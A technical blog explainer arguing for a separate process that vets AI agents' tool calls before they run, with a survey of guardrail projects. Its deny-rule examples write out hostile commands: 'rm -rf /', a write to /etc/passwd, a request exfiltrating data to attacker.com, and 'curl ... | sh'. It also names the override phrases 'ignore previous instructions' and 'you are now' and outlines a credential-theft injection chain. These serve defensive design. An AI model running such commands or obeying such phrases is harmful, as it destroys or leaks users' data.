Technical ExplainerAI & Intelligent SystemsSoftware Engineering

A Smart Firewall for AI Tool Calls

What if every tool call from an AI agent had to pass through an independent process that decided whether it looked safe — before anything executed?

· 10 min read

Share

The Missing Layer

In the previous post we looked at where AI agent vulnerabilities actually live: not in the model, but in the thin wrapper code that parses tool calls and executes them without meaningful oversight. The model says "run this", the wrapper runs it, and nobody in between asks whether that's a good idea.

The obvious question: what would it look like to add that missing layer?

Two Problems, Two Processes

There are really two distinct gaps in the current agent architecture:

Discovery. The model needs to know which tools exist and what they can do. Today, most agent frameworks solve this with a static list baked into the system prompt — "you have access to bash, read, write, web_search." The model gets a text description of each tool and works out what to do with them. There is no runtime negotiation, no capability-based access control, no way for tools to declare their own constraints.

Evaluation. When the model generates a tool call, something needs to decide whether to actually execute it. Today that's either "always yes" (autonomous mode) or "ask the human" (interactive mode). There is nothing in between — no programmatic evaluation of whether a specific call, with these specific arguments, in this specific context, looks reasonable.

These are separate concerns and they should be separate processes.

The Tool Registry

The first piece is a registration protocol. Instead of hardcoding tool descriptions into the system prompt, tools register themselves with a proxy process at startup. Each registration includes:

  • Name and description — what the model sees
  • Input schema — structured definition of valid arguments
  • Capability declaration — what this tool can actually do (read filesystem, write filesystem, network access, execute code)
  • Constraint declaration — what this tool explicitly cannot or should not do (no writes outside this directory, no network calls to external hosts, no recursive execution)
  • Risk classification — read-only vs. mutating, local vs. networked, reversible vs. destructive

This is not entirely hypothetical. Anthropic's Model Context Protocol (MCP) already implements the discovery half of this pattern. MCP lets tools advertise themselves to a host application with structured schemas, and the host can expose different tool sets to different model sessions. It handles the "what tools exist and what do they accept" problem well.

What MCP does not currently handle is the constraint and risk classification layer. A tool can say "I accept a file path argument" but it cannot say "I should only be used on files within /workspace" or "I am a destructive operation that should require elevated approval." That metadata exists informally — in documentation, in tool descriptions that the model reads as natural language — but it is not machine-enforceable.

The gap between "tools describe their interface" and "tools declare their constraints" is where a registry adds value. If every tool must register its capabilities and limitations as structured data, the proxy has something to enforce against.

The Evaluation Process

The second piece is more interesting. A separate process — not the model, not the wrapper, not the tool itself — that evaluates every tool call before execution.

Think of it as a firewall that sits between the model's output parser and the tool dispatcher:

Model generates tool call
       ↓
   [Parser]  →  structured tool call (name, arguments)
       ↓
   [Evaluator Process]  →  allow / deny / modify / escalate
       ↓
   [Tool Dispatcher]  →  execute and return result

The evaluator receives the parsed tool call plus context: what task is the agent working on, what tools it has called previously in this session, what the original user instruction was. It returns one of four decisions:

  • Allow — the call is consistent with the agent's task and within the tool's declared constraints. Execute it.
  • Deny — the call violates a constraint, attempts something outside the agent's scope, or matches a known dangerous pattern. Block it and return an error to the model.
  • Modify — the call is mostly fine but needs adjustment. Scope a file path to the allowed directory. Strip dangerous flags from a command. Redact sensitive arguments from logs.
  • Escalate — the call is ambiguous. It might be fine, it might not be. Flag it for human review or for a higher-trust evaluation.

The critical design decision: the evaluator runs in a separate process. Not a function call inside the agent loop. A separate process with its own permissions, its own failure mode, its own logs. If the agent process is compromised, the evaluator is not. If the evaluator crashes, the agent cannot execute tools at all — fail closed, not open.

What the Evaluator Actually Checks

The evaluator does not need to understand the agent's intent. It needs to answer a simpler question: does this specific tool call, with these specific arguments, violate any rules?

Static rules cover the obvious cases:

  • bash("rm -rf /") → deny. Always.
  • write_file("/etc/passwd", ...) → deny. The agent has no business writing outside its workspace.
  • web_request("http://attacker.com/exfil?data=...") → deny. The agent should not be making requests to arbitrary external hosts.
  • bash("curl ... | sh") → deny. Piping remote content to a shell is never what you want an agent doing.

Contextual rules handle subtler cases:

  • The agent was asked to refactor a Python file but is now calling web_search. Is that expected? Maybe — it might need documentation. Flag it but allow.
  • The agent has made 47 file writes in the last 30 seconds. That's abnormal. Pause and escalate.
  • The agent is calling bash with a command that includes an environment variable it was not given. Where did it learn that variable name? Something injected it.

Pattern matching catches prompt injection artifacts:

  • Tool arguments containing phrases like "ignore previous instructions" or "you are now"
  • Commands that attempt to read the agent's own system prompt or configuration
  • Recursive agent invocations (the agent trying to spawn another agent with elevated permissions)

Cross-tool chain detection is where it gets interesting. Individual tool calls might look benign, but the sequence tells a different story: read inbox → find credentials → send email to external address. Detecting these multi-step patterns requires the evaluator to maintain session state, not just evaluate calls in isolation.

The evaluator can itself be an LLM — a smaller, cheaper model whose only job is classification. It never generates tool calls. It never sees the full conversation. It receives a structured input (tool name, arguments, context summary) and returns a structured output (allow/deny/modify/escalate with reasoning). Its attack surface is minimal because it has no tools of its own.

This Is Already Happening

The pattern described above is not theoretical. Several projects have appeared in the last few months that implement exactly this architecture, and the convergence is striking.

AEGIS, published as an academic paper on 13 March 2026, implements what the authors call a "pre-execution firewall and audit layer." It interposes on the tool-execution path with a three-stage pipeline: deep string extraction from tool arguments, content-first risk scanning, and composable policy validation. The numbers are compelling: across a suite of 48 attack instances, AEGIS blocks all of them before execution, with a 1.2% false positive rate on 500 benign calls and just 8.3 milliseconds of median latency per interception. It supports 14 agent frameworks across Python, JavaScript, and Go. High-risk calls get held for human approval, and every decision goes into a tamper-evident audit trail using Ed25519 signatures and SHA-256 hash chaining. That last detail matters — when something goes wrong, you need to prove the log was not altered after the fact.

Agent Wall takes the "Cloudflare for AI agents" approach. It sits as a proxy between MCP clients and servers, implementing its own JSON-RPC parsing (no dependency on the MCP SDK itself) and applying a YAML-configured policy on every tool call. What makes it interesting is the defence-in-depth: an injection detector with 30+ prompt injection patterns, egress control that catches SSRF attempts including hex and octal IP obfuscation, a chain detector for multi-step attack patterns, and a kill switch for emergency deny-all. Responses get scanned too — the proxy checks what comes back from tool execution for leaked secrets and PII before it reaches the model.

Invariant Guardrails takes a different, more expressive approach. Instead of static YAML rules, it offers a Python-inspired policy language that can match across sequences of tool calls. You can write rules like "raise an error if a get_website call returns content that triggers prompt injection detection, and the next tool call is send_email." That is a cross-tool chain detection rule — it understands that individual calls might be fine but the sequence is an attack. Invariant deploys as a gateway between your application and your MCP servers or LLM provider, evaluating rules on each request without invasive code changes. It has nearly 400 GitHub stars and 250+ commits, suggesting genuine production use rather than a weekend experiment.

Claude Code's hooks system is a lighter-weight version of the same idea — shell commands that run before or after tool execution, with the ability to inspect the tool call and block it. It is script-based rather than a persistent evaluation process, but it recognises the right architectural boundary: something other than the model needs to evaluate tool calls before they execute.

The convergence here is the important signal. Four independent implementations, all arriving at the same architecture within weeks of each other: a proxy that sits between the model and tool execution, evaluating every call against a policy before anything runs. When multiple teams independently converge on the same design, it usually means the design is load-bearing.

The Economics Make Sense

The obvious objection: adding an evaluation step to every tool call adds latency and cost. AEGIS answers this directly: 8.3 milliseconds median latency. That is effectively free compared to the 1-5 seconds a typical LLM API call takes.

For rule-based evaluation, the overhead is negligible — a few milliseconds per call. You could implement the static rules as a simple process that validates arguments against patterns and only escalates to a model for ambiguous cases. The common path (routine file reads, standard commands, expected API calls) gets a fast pass. The unusual cases get scrutiny.

Compare that to the cost of a compromised agent exfiltrating customer data, wiping a production database, or committing malicious code. We spend more on SSL certificate management than most teams spend on agent security.

The Design Principle

The underlying principle is simple: the thing that decides what to execute should not be the same thing that generates the request to execute.

In traditional software, we take this for granted. The application server does not evaluate its own access control — that is the job of middleware, proxies, and infrastructure policy. The database does not decide which queries to allow — that is handled by roles, permissions, and parameterised queries.

AI agents are the first major category of software where we have decided, apparently, that the thing generating the action should also be trusted to decide whether the action is appropriate. We would never accept this in any other domain. A web application that evaluated its own input validation would be considered a security joke.

The agent loop needs a firewall. Not a smarter prompt. Not a more aligned model. A separate process, with separate permissions, that evaluates every tool call against declared constraints before anything executes.

The model generates. The proxy evaluates. The tool executes. Three concerns. Three processes. Three trust boundaries.

The tools to build this are appearing now. The question is whether the industry adopts them before the first serious agent-mediated breach forces the issue.

Want to discuss this?

We write about what we're actually working on. If this is relevant to something you're building, we'd love to hear about it.